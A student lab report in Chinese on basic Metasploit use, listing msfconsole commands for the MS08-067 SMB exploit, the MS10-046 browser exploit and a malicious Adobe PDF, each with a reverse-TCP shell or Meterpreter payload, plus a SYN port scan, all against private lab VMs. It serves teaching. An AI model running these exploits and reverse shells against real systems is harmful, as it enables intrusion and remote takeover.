2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
一.原理与实践说明
1.实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067; (1分)
一个针对浏览器的攻击,如ms11-050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
2.基础问题回答
exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。payload就是需要传送到靶机上的攻击代码本身。encode是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避查杀
实践过程
1.Windows服务渗透攻击——MS08-067安全漏洞
实验步骤
先选择靶机为windows xp sp3
在kali终端中开启msfconsole。
输入命令
search ms08_067,会显示出找到的渗透模块,如下图所示(

输入命令
use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用输入
show payloads查看攻击载荷

使用命令
set payload generic/shell_reverse_tcp设置攻击有效载荷输入命令
show options显示我们需要在攻击前需要设置的数据,如下图

输入命令
set LHOST 192.168.1.108输入命令
set RHOST 192.168.1.109使用命令
show options再次查看payload状态。

输入命令
exploit开始攻击,但很不幸,攻击没有成功。

我们换一下另一个虚拟机试一下,这台靶机是win2000,ip地址是192.168.1.114,这次很轻松的成功了。

2.浏览器渗透攻击--ms10_046(靶机WindowsXP)
实验步骤
输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader输入
set payload windows/meterpreter/reverse_tcp查看要输入的参数
show options

输入
set LHOST 192.168.1.108开始攻击
exploit

将
http://192.168.1.108:80/在靶机winXP中打开

查看会话效果如下:

输入sessions -i 2即可选择会话,然后就攻击成功

3、针对Adobe Reader软件的渗透攻击——adobe_toolbutton
在kali终端中开启msfconsole。
输入命令
use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。使用命令
set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。输入命令
show options显示我们需要在攻击前需要设置的数据

输入命令
set FILENAME 20165317.pdf
set LHOST 192.168.1.108
输入
exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。使用命令back退出当前模块,并使用
use exploit/multi/handler新建一个监听模块。使用
set payload windows/meterpreter/reverse_tcp建立一个反向连接。需要输入命令set LHOST和攻击模块里的数据设置为一样的使用命令
exploit开始攻击,但是失败了。

最后发现是上一次连接没有断开导致端口被占用,重新监听得到效果如下(14)

4.辅助模块应用
开放端口扫描
使用
show auxiliary查看可以运用的辅助模块:

使用此模块扫描端口
use auxiliary/scanner/portscan/syn使用命令
show optionsset RHOSTS 192.168.1.109(目标)set THREADS 50(线程)exploit扫描结果如下(16)

实践总结与体会
由于时间和身体原因并未完成要求(和其他同学不同的操作),但是在实验的过程中确实体会到了Windows系统的漏洞很多,能被利用的也很多
离实战还缺些什么技术或步骤?
我觉得最大的问题是如何找到并利用新的漏洞。
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
随机推荐
- ubuntu 16.04 安装 kubelet、kubeadm 和 kubectl
解决了***之后,就开始K8S安装的正式旅程,本次记录 kubelet.kubeadm 和 kubectl 的安装: apt-get update && apt-get instal ...
- Windows平台下结合 tortoiseSVN 和 VisualSVN Server 搭建SVN服务器并实现 web 站点同步
1. tortoiseSVN 关于 tortoiseSVN 的安装使用详见博文 TortoiseSVN的安装及其简单使用. 2. VisualSVN Server 关于 VisualSVN Serve ...
- C语言学习及应用笔记之七:C语言中的回调函数及使用方式
我们在使用C语言实现相对复杂的软件开发时,经常会碰到使用回调函数的问题.但是回调函数的理解和使用却不是一件简单的事,在本篇我们根据我们个人的理解和应用经验对回调函数做简要的分析. 1.什么是回调函数 ...
- 微信小程序+java后台
博主是大四学生,毕业设计做的是微信小程序+java后台.陆陆续续经历了三个月(因为白天要实习又碰上过年玩了一阵子),从对微信小程序一无所知到完成毕设,碰到许多问题,在跟大家分享一下自己的经历和一个小程 ...
- 【python3接口自动化基础】json总结
Json知识归纳: Post请求有两种方法传json参数 传json参数(自动转json了)---json=dict 传data参数(需json转换) ---data=json.dumps(dic) ...
- 解决git反复输入密码的问题
打开git命令面板 cd到项目根目录 $ git config --global credential.helper store然后只输入一次密码,后面就不需要了
- James Munkres Topology: Theorem 20.4
Theorem 20.4 The uniform topology on \(\mathbb{R}^J\) is finer than the product topology and coarser ...
- matplotlib 3D数据-【老鱼学matplotlib】
直接上代码: import numpy as np import matplotlib.pyplot as plt # 导入显示3D的库 from mpl_toolkits.mplot3d impor ...
- (一)主域相同子域不同之document.domain跨域
一.什么是主域名,什么是子域名? 主域名又称一级域名或者顶级域名,由域名主体.域名后缀组成,比如cnblogs.com : 子域名有二级域名,比如www.cnblogs.com.三级域名,比如home ...
- DWM1000 多个标签定位讨论 --[蓝点无限]
多标签代码已经基本实现,完成代码可以在论坛上下载 http://bphero.com.cn/forum.php?mod=viewthread&tid=53&fromuid=2 蓝点D ...